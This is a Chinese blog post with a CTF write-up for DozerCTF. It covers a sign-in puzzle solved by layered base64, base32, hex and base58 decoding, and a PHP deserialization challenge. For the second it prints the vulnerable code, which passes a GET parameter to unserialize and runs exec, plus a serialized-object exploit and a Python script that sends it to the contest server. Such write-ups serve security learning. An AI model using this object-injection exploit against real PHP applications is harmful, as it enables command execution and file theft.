• DOZERCTF 反序列化和签到wp


    ------------恢复内容开始------------

    1、签到题

      exe文件打不开,然后我用记事本打开发现是一串字符,

    R00yVE1NWlRIRTJFRU5CWUdVM1RNUlJURzRaVEtOUllHNFpUTU9CV0lJM0RRTlJXRzQ0VE9OSlhHWTJET05aUkc1QVRPTUJUR0kyRUVNWlZHNDNUS05aWEc0MlRHTkpaR1pBVElNUldHNDNUT05KVUc0M0RPTUJXR0kyRUtOU0ZHTTRUT09CVUc0M0VFPT09Cgo=

      看到后面的等于号我就直接用base64解密,还是得到一串等于号结尾的字符串,继续用base64解解不出来,然后用base32解出来了

    3563394B48576F37356873686B686679757647717A70324B3577577753596A426777547670624E6E3978476B
    

      怀疑是hex加密,然后hex解密

    5c9KHWo75hshkhfyuvGqzp2K5wWwSYjBgwTvpbNn9xGk
    

      然后就卡住了,被大佬提醒是base58加密,

    进行base58解密得出flag:

    Dozerctf{base_family_is_so_good}
    

      

     2、反序列化题

      这道题确实是白给的

    if ($_GET['path']) {
        $path = @$_GET['path'];
        unserialize($path);
    } else {
        highlight_file(__FILE__);
    
    }

      直接插入反序列化的值没有设卡

    class home
    {
        private $method;
        private $args;
        function __construct($method, $args)
        {
            $this->method = $method;
            $this->args = $args;
        }
    
        function __destruct()
        {
            if (in_array($this->method, array("mysys"))) {
                call_user_func_array(array($this, $this->method), $this->args);
            }
        }
    
        function mysys($path)
        {
            print_r(base64_encode(exec("cat $path")));
        }
        function waf($str)
        {
            if (strlen($str) > 8) {
                die("No");
            }
            return $str;
        }
    
        function __wakeup()
        {
            $num = 0;
            foreach ($this->args as $k => $v) {
                $this->args[$k] = $this->waf(trim($v));
                $num += 1;
                if ($num > 2) {
                    die("No");
                }
            }
        }
    }

      这到题主要就是绕过:in_array($this->method, array("mysys"))和__wakeup

    其实第一个都不用绕过,直接上exp:

    <?
    class home
    {
        private $method;
        private $args;
        function __construct($method, $args)
        {
            $this->method = $method;
            $this->args = $args;
            // print_r(array($this, $this->method));
        }
    
        function __destruct()
        {
            if (in_array($this->method, array("mysys"))) {
                call_user_func_array(array($this, $this->method), $this->args);
                // echo 1;
            }
        }
    
        function mysys($path)
        {
            print_r(base64_encode(exec("cat $path")));
        }
        function waf($str)
        {
            if (strlen($str) > 8) {
                die("No");
            }
            return $str;
        }
    
        function __wakeup()
        {
            $num = 0;
            foreach ($this->args as $k => $v) {
                $this->args[$k] = $this->waf(trim($v));
                $num += 1;
                if ($num > 2) {
                    die("No");
                }
            }
        }
    }
    
    $b = array('flag.php');
    $a =new home('mysys',$b);
    $a = serialize($a);
    
    echo base64_encode($a);

    我本来是想直接用get方式传上去的但是试了几次没用我就改用python传了

    import base64
    import requests
    url = 'http://118.31.11.216:30600/'
    php = base64.b64decode('Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NToibXlzeXMiO3M6MTA6IgBob21lAGFyZ3MiO2E6MTp7aTowO3M6ODoiZmxhZy5waHAiO319')
    # print(php)
    data = {'path':php}
    r = requests.get(url,params=data)
    print(r.text)
    

      这flag差不多就出来了

  • 相关阅读:
    java面向对象编程(七)--四大特征之多态
    java面向对象编程--Josephu问题(丢手帕问题)
    好文推荐
    树状数组学习笔记
    B2104 矩阵加法
    B2107 图像旋转
    B2128 素数个数
    求细胞数量
    洛谷 CF863A Quasi-palindrome
    30秒搞定所有英文连读
  • 原文地址:https://www.cnblogs.com/txxj/p/13131043.html
走看看 - 开发者的网上家园